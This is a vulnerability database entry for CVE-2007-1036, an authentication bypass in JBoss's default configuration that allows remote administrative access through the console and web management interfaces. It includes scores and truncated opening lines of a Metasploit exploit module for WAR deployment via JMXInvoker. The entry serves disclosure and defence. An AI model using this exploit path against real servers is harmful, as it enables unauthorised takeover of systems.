CVE-2007-1036

Published: 21/02/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote malicious users to bypass authentication and gain administrative access via direct requests.

Vulnerable Product

jboss jboss application server

Exploits

## # $Id: jboss_maindeployerrb 10754 2010-10-19 22:24:33Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' cl ...
require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvoker ...